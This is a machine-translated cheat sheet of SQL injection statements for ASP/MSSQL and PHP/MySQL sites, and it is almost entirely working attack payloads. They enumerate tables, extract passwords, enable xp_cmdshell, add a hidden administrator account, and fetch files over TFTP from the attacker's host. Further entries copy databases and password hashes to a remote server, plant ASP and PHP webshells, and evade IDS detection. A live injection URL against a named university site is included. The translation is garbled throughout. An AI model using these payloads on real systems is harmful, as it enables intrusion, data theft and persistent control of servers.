asp/php SQL injection Statement collation Encyclopedia

Standard injection Statements

1. Determine whether there is a point of injection
; and 1=1 and 1=2
2. Guess table General table name is no more than admin Adminuser user pass password and so on.
and 0<> (SELECT COUNT (*) from *)
and 0<> (SELECT COUNT (*) from admin)---Determine if the admin table exists
3. Guess the number of accounts if encountered 0< return to the correct page 1< return error page to explain the number of accounts is a
and 0< (SELECT COUNT (*) from admin)
and 1< (SELECT COUNT (*) from admin)
4. Guess the field name is added to the Len () bracket with the field name we think of.
and 1= (SELECT COUNT (*) from admin where Len (*) >0)--
and 1= (SELECT COUNT (*) from admin where Len (user field name) >0)
and 1= (SELECT COUNT (*) from admin where Len (_blank> password field name password) >0)
5. Guess the length of each field guess solution length is to transform >0 until the correct page is returned
and 1= (SELECT COUNT (*) from admin where Len (*) >0)
and 1= (SELECT COUNT (*) from admin where Len (name) >6) error
and 1= (SELECT COUNT (*) from admin where Len (name) >5) The correct length is 6
and 1= (SELECT COUNT (*) from admin where Len (name) =6) is correct
and 1= (SELECT COUNT (*) from admin where Len (password) >11) is correct
and 1= (SELECT COUNT (*) from admin where Len (password) >12) error length 12
and 1= (SELECT COUNT (*) from admin where Len (password) =12) is correct
6. Guess the character
and 1= (SELECT COUNT (*) from admin where left (name,1) =a)---Guess the first digit of the user account
and 1= (SELECT COUNT (*) from admin where left (name,2) =ab)---Guess the second digit of the user account
Just one character at a time. Guess how many you just guessed. The account number is out.
and 1= (select top 1 count (*) from Admin where ASC (mid pass,5,1) =51)--
This query can be used to guess the Chinese user and _blank> password. Just change the number in the Assic to Chinese. Finally, the result is converted to a character.
GROUP BY Users.id has 1=1--
Group by Users.id, Users.username, Users.password, Users.privs has 1=1--
; Insert into users values (666, Attacker, Foobar, 0xFFFF)--
UNION SELECT top 1 column_blank>_name from Information_blank>_schema. COLUMNS WHERE table_blank>_name=logintable-
UNION SELECT top 1 column_blank>_name from Information_blank>_schema. COLUMNS where table_blank>_name=logintable where Column_blank>_name not in (login_blank>_id)-
UNION SELECT top 1 column_blank>_name from Information_blank>_schema. COLUMNS where table_blank>_name=logintable where Column_blank>_name not in (login_blank>_id,login_blank>_ Name)-
UNION SELECT top 1 login_blank>_name from logintable-
UNION SELECT top 1 password from logintable where login_blank>_name=rahul--
See _blank> server Dozen patch = Error SP4 patch
and 1= (SELECT @ @VERSION)--
See _blank> database Connection account permissions, return to normal, proof is _blank> server role sysadmin permissions.
and 1= (SELECT is_blank>_srvrolemember (sysadmin))--
Determine the connection _blank> database account number. (with SA account connection back to normal = Confirm the Connection account is SA)
and sa= (SELECT system_blank>_user)--
and User_blank>_name () =dbo--
and 0<> (select User_blank>_name ()--
See if Xp_blank>_cmdshell deleted
and 1= (SELECT count (*) from master.dbo.sysobjects WHERE xtype = X and name = Xp_blank>_cmdshell)--
Xp_blank>_cmdshell is deleted, restored, and supports absolute path recovery
; EXEC Master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,xplog70.dll--
; EXEC Master.dbo.sp_blank>_addextendedproc xp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll--
Reverse Ping your own experiment
; use Master;declare @s int;exec sp_blank>_oacreate "Wscript.Shell", @s out;exec sp_blank>_oamethod @s, "Run", NULL, "Cmd.exe/c ping 192.168.0.1";--
Add account number
;D eclare @shell INT exec sp_blank>_oacreate Wscript.Shell, @shell OUTPUT exec sp_blank>_oamethod @shell, Run,null, C : \winnt\system32\cmd.exe/c net user jiaoniang$ 1866574/add--
Create a virtual directory E disk:
;d eclare @o int exec sp_blank>_oacreate Wscript.Shell, @o out exec sp_blank>_oamethod @o, run, NULL, Cscript.exe C:\ Inetpub\wwwroot\mkwebdir.vbs-w "Default Web Site"-V "E", "E:\"-
Access properties: (with writing a webshell)
DECLARE @o int exec sp_blank>_oacreate Wscript.Shell, @o out exec sp_blank>_oamethod @o, run, NULL, Cscript.exe c:\i Netpub\wwwroot\chaccess.vbs-a w3svc/1/root/e +browse
Special _blank> tips::%5c=\ or put/and/or modify%5 submit
and 0<> (select top 1 paths from newtable)--
Get the library name (from 1 to 5 are system id,6 above can be judged)
and 1= (select name from master.dbo.sysdatabases where dbid=7)--
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid = 7,8,9 in turn .... Get more _blank> database names
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) bursts into a table that is assumed to be admin
and 0<> (select top 1 name from Bbs.dbo.sysobjects where Xtype=u and name not in (Admin)) to get the other tables.
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where Xtype=u and Name=admin
and uid> (str (ID)) The number of bursts to the UID is assumed to be 18779569 Uid=id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569) gets a field from admin, assuming user_blank>_id
and 0<> (select top 1 name from Bbs.dbo.syscolumns where id=18779569 and name does not
(ID,...)) To storm out the other fields.
and 0< (select user_blank>_id from BBS.dbo.admin where username>1) can get user name
In turn, you can get the _blank> password .... Suppose there are fields such as user_blank>_id username, password, etc.
and 0<> (SELECT COUNT (*) from master.dbo.sysdatabases where name>1 and dbid=6)
and 0<> (select top 1 name from bbs.dbo.sysobjects where xtype=u) gets the table name
and 0<> (select top 1 name from Bbs.dbo.sysobjects where Xtype=u and name isn't in (address))
and 0<> (SELECT COUNT (*) from bbs.dbo.sysobjects where Xtype=u and Name=admin and uid> (str (ID)) Determine the ID value
and 0<> (select top 1 name from BBS.dbo.syscolumns where id=773577794) all fields
? id=-1 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
? id=-1 Union Select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access)
Get the Web Path
; CREATE TABLE [dbo]. [Swap] ([Swappass][char] (255));--
and (select top 1 swappass from swap) =1--
; CREATE TABLE newtable (id int IDENTITY (1,1), paths varchar) Declare @test varchar () exec master. Xp_blank>_regread @rootkey =hkey_blank>_local_blank>_machine, @key =system\currentcontrolset\services\ W3svc\parameters\virtual roots\, @value_blank >_name=/, values= @test OUTPUT insert INTO paths (path) values (@test)--
; Use ku1;--
; CREATE table cmd (str image);--Create table cmd of image type
There is a Xp_blank>_cmdshell test process:
; exec master.. Xp_blank>_cmdshell dir
; exec master.dbo.sp_blank>_addlogin jiaoniang$;--plus SQL account
; exec Master.dbo.sp_blank>_password null,jiaoniang$,1866574;--
; exec master.dbo.sp_blank>_addsrvrolemember jiaoniang$ sysadmin;--
; Exec Master.dbo.xp_blank>_cmdshell net user jiaoniang$ 1866574/workstations:*/times:all/passwordchg:yes/ passwordreq:yes/active:yes/add;--
; exec Master.dbo.xp_blank>_cmdshell net localgroup Administrators jiaoniang$/add;--
EXEC master.. Xp_blank>_servicecontrol Start, schedule launch _blank> service
EXEC master.. Xp_blank>_servicecontrol Start, server
; DECLARE @shell INT exec sp_blank>_oacreate Wscript.Shell, @shell OUTPUT exec sp_blank>_oamethod @shell, Run,null, C: \winnt\system32\cmd.exe/c NET user jiaoniang$ 1866574/add
;D eclare @shell INT exec sp_blank>_oacreate Wscript.Shell, @shell OUTPUT exec sp_blank>_oamethod @shell, Run,null, C:\WINNT\SYSTEM32\CMD.EXE/C net localgroup Administrators jiaoniang$/add
; EXEC master.. Xp_blank>_cmdshell tftp-i Youip Get file.exe--use TFTP to upload files
;d eclare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;d eclare @a sysname set @a=xp+_blank>_cm ' + ' Dshell exec @a dir c:\
;d eclare @a;set @a=db_blank>_name (); Backup database @a to disk= your IP your shared directory Bak.dat
If you are limited, you can.
SELECT * FROM OPENROWSET (_blank>sqloledb,server;sa;,select ok! exec master.dbo.sp_blank>_addlogin Hax)
Query construction:
SELECT * FROM news WHERE id= ... and topic= ... And .....
Adminand 1= (SELECT COUNT (*) from [user] where Username=victim and right (left (userpass,01), 1) =1) and Userpass <>
Select 123;--
; Use master;--
: A or name like fff%;--shows a user named FFFF.
and 1<> (select count (email) from [user]);--
; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and status>0) where name=ffff;--
; Update [users] set email= (select top 1 id from sysobjects where xtype=u and Name=ad) where name=ffff;--
; Update [users] set email= (select top 1 name from sysobjects where Xtype=u and id>581577110) where name=ffff;--
; Update [users] set email= (select top 1 count (IDs) from password) where name=ffff;--
; Update [users] set email= (select top 1 pwd from password where id=2) where name=ffff;--
; Update [users] set email= (select top 1 name from password where id=2) where name=ffff;--
The above statement is to get the first user table in the _blank> database and place the table name in the FFFF user's mailbox field.
By looking at FFFF's user profile, you can get the first one to use the table called AD
And then get the ID of the table based on the table name ad to get the name of the second table.
Insert into users values (666, char (0x63) +char (0x68) +char (0x72) +char (0x69) +char (0x73), char (0x63) +char (0x68) +char ( 0x72) +char (0x69) +char (0x73), 0xFFFF)--
Insert into users values (667,123,123,0XFFFF)--
Insert into users values (123, admin--, Password, 0xffff)--
; and user>0
; and (select COUNT (*) from sysobjects) >0
; and (select COUNT (*) from mysysobjects) >0//as access_blank> database
Name of the data table
Update AAA Set aaa= (select top 1 name from sysobjects where xtype=u and status>0);--
This is where the first table name is updated to the AAA field.
read out the first table, and the second table can be read like this (after the condition plus the name of the table that name<> just obtained).
Update AAA Set aaa= (select top 1 name from sysobjects where xtype=u and status>0 and Name<>vote);--
Then id=1552 and exists (SELECT * from AAA where aaa>5)
read out the second table, read it all, until it's not.
Read the field like this:
Update AAA Set aaa= (select top 1 col_blank>_name (object_blank>_id (table name), 1));--
Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name
Update AAA Set aaa= (select top 1 col_blank>_name (object_blank>_id (table name), 2));--
Then id=152 and exists (SELECT * from AAA where aaa>5) error, get field name
[Get data table name] [Update the field value to the table name, and then try to read out the value of the field to get the table name]
Update table name Set field = (select top 1 name from sysobjects where xtype=u and status>0 [and name<> the table name you obtained to find one plus one]) [whe Re condition] Select top 1 name to sysobjects where Xtype=u and status>0 and name not in (Table1,table2,...)
_blank> vulnerability through SQL Server injection _blank> database administrator account and system administrator account [current account must be sysadmin group]
[Get Data table field name] [Update the field value to the field name, and then try to read out the value of the field to get the field name]
Update table name Set field = (select top 1 col_blank>_name (object_blank>_id (data table name to query), field column as: 1) [Where condition]
Bypass IDs detection [using variables]
;d eclare @a sysname set @a=xp_blank>_+cmdshell exec @a dir c:\
;d eclare @a sysname set @a=xp+_blank>_cm ' + ' Dshell exec @a dir c:\
1, open the remote _blank> database
Basic syntax
SELECT * FROM OPENROWSET (SQLOLEDB, server=servername;uid=sa;pwd=123, select * FROM table1)
Parameters: (1) OLE DB Provider name
2, where the connection string parameter can be any port used to connect, such as
SELECT * FROM OPENROWSET (SQLOLEDB, uid=sa;pwd=123; NETWORK=DBMSSOCN; address=192.168.0.1,1433, select * FROM table
3. Copy all remote tables to the local table for the entire _blank> database of the target host.
Basic syntax:
INSERT INTO OPENROWSET (SQLOLEDB, server=servername;uid=sa;pwd=123, select * to table1) SELECT * FROM Table2
This line of statements copies all the data from the Table2 table on the target host to the Table1 table in the remote _blank> database. In practice, the IP address and port of the connection string are appropriately modified to point to where needed, such as:
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * FROM Table2
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _blank>_sysdatabases)
SELECT * FROM master.dbo.sysdatabases
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _blank>_sysobjects)
SELECT * FROM User_blank>_database.dbo.sysobjects
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _blank>_syscolumns)
SELECT * FROM User_blank>_database.dbo.syscolumns
Copy _blank> database:
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table1) SELECT * from database. Table1
Insert into OPENROWSET (sqloledb,uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * FROM table2) SELECT * from database. Table2
The hash of the copy Hassi (hash) login _blank> password is stored in the sysxlogins. The method is as follows:
INSERT INTO OPENROWSET (SQLOLEDB, uid=sa;pwd=123; NETWORK=DBMSSOCN; Address=192.168.0.1,1433;,select * from _blank>_sysxlogins) SELECT * FROM Database.dbo.sysxlogins
After the hash is obtained, it can be violently cracked.
Ways to traverse a directory: Create a temporary table first: Temp
CREATE table temp (ID nvarchar (255), Num1 nvarchar (255), num2 nvarchar (255), num3 nvarchar (255));--
; Insert temp exec master.dbo.xp_blank>_availablemedia;--get all current drives
; INSERT into temp (ID) EXEC master.dbo.xp_blank>_subdirs c:\;--get a subdirectory list
; INSERT into temp (ID,NUM1) EXEC master.dbo.xp_blank>_dirtree c:\;--Get the directory tree structure of all subdirectories and inch into the temp table
; INSERT into temp (ID) EXEC Master.dbo.xp_blank>_cmdshell type c:\web\index.asp;--View the contents of a file
; INSERT into temp (ID) exec Master.dbo.xp_blank>_cmdshell dir c:\;--
; INSERT into temp (ID) exec Master.dbo.xp_blank>_cmdshell dir c:\ *.asp/s/a;--
; INSERT into temp (ID) exec Master.dbo.xp_blank>_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
; INSERT into temp (ID,NUM1) EXEC master.dbo.xp_blank>_dirtree c:\;--(xp_blank>_dirtree applicable permissions public)
Write to table:
Statement 1:and 1= (SELECT is_blank>_srvrolemember (sysadmin));--
Statement 2:and 1= (SELECT is_blank>_srvrolemember (serveradmin));--
Statement 3:and 1= (SELECT is_blank>_srvrolemember (setupadmin));--
Statement 4:and 1= (SELECT is_blank>_srvrolemember (securityadmin));--
Statement 5:and 1= (SELECT is_blank>_srvrolemember (securityadmin));--
Statement 6:and 1= (SELECT is_blank>_srvrolemember (diskadmin));--
Statement 7:and 1= (SELECT is_blank>_srvrolemember (bulkadmin));--
Statement 8:and 1= (SELECT is_blank>_srvrolemember (bulkadmin));--
Statement 9:and 1= (SELECT is_blank>_member (Db_blank>_owner));--
Write the path to the table:
; Create table dirs (paths varchar (), ID int)--
; Insert dirs exec master.dbo.xp_blank>_dirtree c:\--
and 0<> (select top 1 paths from dirs)--
and 0<> (select top 1 paths to dirs where paths not in (@Inetpub))--
; Create table dirs1 (paths varchar (), ID int)--
; Insert dirs exec master.dbo.xp_blank>_dirtree e:\web--
and 0<> (select top 1 paths from dirs1)--
Back up the _blank> database to the Web directory: Download
;d eclare @a sysname; Set @a=db_blank>_name (); Backup Database @a to disk=e:\web\down.bak;--
and 1= (select top 1 name from (select top Id,name to sysobjects where Xtype=char) T ORDER BY id DESC)
and 1= (Select top 1 col_blank>_name (object_blank>_id (User_blank>_login), 1) from sysobjects) refer to the related table.
and 1= (select user_blank>_id from User_blank>_login)
and 0= (select User from User_blank>_login where user>1)
-=-Wscript.Shell Example-=-
DECLARE @o int
exec sp_blank>_oacreate Wscript.Shell, @o out
EXEC Sp_blank>_oamethod @o, run, NULL, notepad.exe
; DECLARE @o int exec sp_blank>_oacreate Wscript.Shell, @o out exec sp_blank>_oamethod @o, run, NULL, notepad.exe--
declare @o int, @f int, @t int, @ret int
DECLARE @line varchar (8000)
exec sp_blank>_oacreate Scripting.FileSystemObject, @o out
exec Sp_blank>_oamethod @o, OpenTextFile, @f out, C:\Boot.ini, 1
exec @ret = Sp_blank>_oamethod @f, ReadLine, @line out
while (@ret = 0)
Begin
Print @line
exec @ret = Sp_blank>_oamethod @f, ReadLine, @line out
End
declare @o int, @f int, @t int, @ret int
exec sp_blank>_oacreate Scripting.FileSystemObject, @o out
exec Sp_blank>_oamethod @o, CreateTextFile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = Sp_blank>_oamethod @f, WriteLine, NULL,
<% Set o = Server.CreateObject ("Wscript.Shell"): O.run (Request.QueryString ("cmd"))%>
declare @o int, @ret int
exec sp_blank>_oacreate Speech.voicetext, @o out
EXEC sp_blank>_oamethod @o, register, NULL, Foo, bar
EXEC sp_blank>_oasetproperty @o, speed, 150
exec Sp_blank>_oamethod @o, speak, NULL, all your sequel servers are belong To,us, 528
WAITFOR DELAY 00:00:05
; declare @o int, @ret int exec sp_blank>_oacreate Speech.voicetext, @o out exec sp_blank>_oamethod @o, register, NULL , foo, bar exec sp_blank>_oasetproperty @o, speed, exec Sp_blank>_oamethod @o, speak, NULL, all your sequel ERs are belong to US 528 waitfor delay 00:00:05--
Xp_blank>_dirtree Applicable Permissions Public
EXEC master.dbo.xp_blank>_dirtree C:\
The information returned has two fields subdirectory, depth. The subdirectory field is a character type and the depth field is an shaping field.
CREATE TABLE dirs (paths varchar (), id int)
The table built here is related to the above Xp_blank>_dirtree, the fields are equal, the types are the same.
Insert dirs exec master.dbo.xp_blank>_dirtree C:\
As long as we create tables that are defined equal to the fields returned by the stored process, they can be executed! To achieve the effect of writing a table, step by step to achieve the information we want!


php+mysql Manual Injection statement

Burst field length
ORDER BY num/*

Matching fields
and 1=1 Union Select 1,2,3,4,5.......n/*

Storm field position
and 1=2 Union Select 1,2,3,4,5.....n/*

Using built-in functions to storm database information
Version () database () User ()

No guessing available field Storm database information (some sites do not apply):
and 1=2 UNION ALL Select Version ()/*
and 1=2 UNION ALL Select Database ()/*
and 1=2 union ALL Select User ()/*

Operating System Information:
and 1=2 UNION ALL SELECT @ @global. version_compile_os from Mysql.user/*

Database permissions:
and Ord (Mid (User (), 1, 1)) =114/* Returns the normal description as root

Bauku (mysql>5.0)

MySQL more than 5 has built-in library information_schema, storage of MySQL all the database and table structure information
and 1=2 Union select 1,2,3,schema_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. Schemata Limit 0,1

Guess table
and 1=2 Union select 1,2,3,table_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. TABLES where table_schema= database (hexadecimal) limit 0 (start record, 0 is first start record), 1 (show 1 Records)-

Guessing field
and 1=2 Union select 1,2,3,column_name,5,6,7,8,9,10 from INFORMATION_SCHEMA. COLUMNS where table_name= table name (hexadecimal) limit 0,1

Mob password
and 1=2 Union Select 1,2,3, username segment, 5,6,7, password segment, 8,9 from table name limit 0,1

Advanced Usage (one available field displays two data contents):
Union Select 1,2,3concat (username segment, 0x3c, password segment), 5,6,7,8,9 from table name limit 0,1

Direct Write horse (Root permission)
Conditions: 1, know the site physical path
2, have sufficient permission (can use Select .... from Mysql.user test)
3, MAGIC_QUOTES_GPC () =off
Select ' <?php eval ($_post[cmd])?> ' into outfile ' physical path '
and 1=2 union ALL Select a Word hex value into outfile ' path '

Load_file () Common path:

1, replace (Load_file (0x2f6574632f706173737764), 0x3c,0x20)
2. Replace (Load_file (char (47,101,116,99,47,112,97,115,115,119,100)), char (+), char (32))
The top two are to view the full display code in a php file. Some times do not replace some characters, such as "<" replaced by "space" to return to the Web page. And you can't see the code.
3, Load_file (char (47)) can list the Freebsd,sunos system root directory
4,/etc tpd/conf tpd.conf or/usr/local/apche/conf tpd.conf view Linux Apache virtual Host configuration file
5, C:\Program Files\apache group\apache\conf \httpd.conf or C:\apache\conf \httpd.conf view the Windows system Apache file
6, c:/resin-3.0.14/conf/resin.conf View JSP development of the website Resin file configuration information.
7, c:/resin/conf/resin.conf/usr/local/resin/conf/resin.conf view the Linux system configuration JSP virtual host
8, d:\APACHE\Apache2\conf\httpd.conf
9, C:\Program Files\mysql\my.ini
Ten 、.. /themes/darkblue_orange/layout.inc.php phpMyAdmin Explosion Path
11. C:\windows\system32\inetsrv\MetaBase.xml View the IIS virtual host configuration file
12,/usr/local/resin-3.0.22/conf/resin.conf for 3.0.22 resin configuration file View
13,/usr/local/resin-pro-3.0.22/conf/resin.conf-ditto
14,/usr/local/app/apache2/conf/extra tpd-vhosts.conf apashe Virtual host view
15,/etc/sysconfig/iptables to see the firewall strategy
16, Usr/local/app/php5 B/php.ini PHP is quite set
17,/etc/my.cnf mysql configuration file
18, the system version of/etc/redhat-release Red Hat
19, C:\mysql\data\mysql\user. MYD exists a user password in the MySQL system
20,/etc/sysconfig/network-scripts/ifcfg-eth0 view IP.
21,/USR/LOCAL/APP/PHP5 B/php.ini//php Related Settings
22,/usr/local/app/apache2/conf/extra tpd-vhosts.conf//virtual Site Settings
23, C:\Program Files\rhinosoft.com\serv-u\servudaemon.ini
24, C:\windows\my.ini
25, C:\Boot.ini
Website Common configuration file config.inc.php, config.php. Load_file () with replace (Load_file (HEX), char (), char (32))
Note:
Char (60) indicates <
Char (32) denotes a space

Problems with manual injection:
When the injection page shows:
Illegal mix of collations (latin1_swedish_ci,implicit) and (utf8_general_ci,implicit) for operation ' UNION '
such as: Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,load_file ( 0x433a5c626f6f742e696e69), 3,4,user ()%20
This is due to inconsistent coding,
Workaround: Add Unhex (Hex (parameters)) to the parameter before it is ready. The above URL can be changed to:
Http://www.mse.tsinghua.edu.cn/mse/research/instrument.php?ID=13%20and%201=2%20union%20select%201,unhex (Hex ( Load_file (0x433a5c626f6f742e696e69)), 3,4,unhex (Hex (User ())%20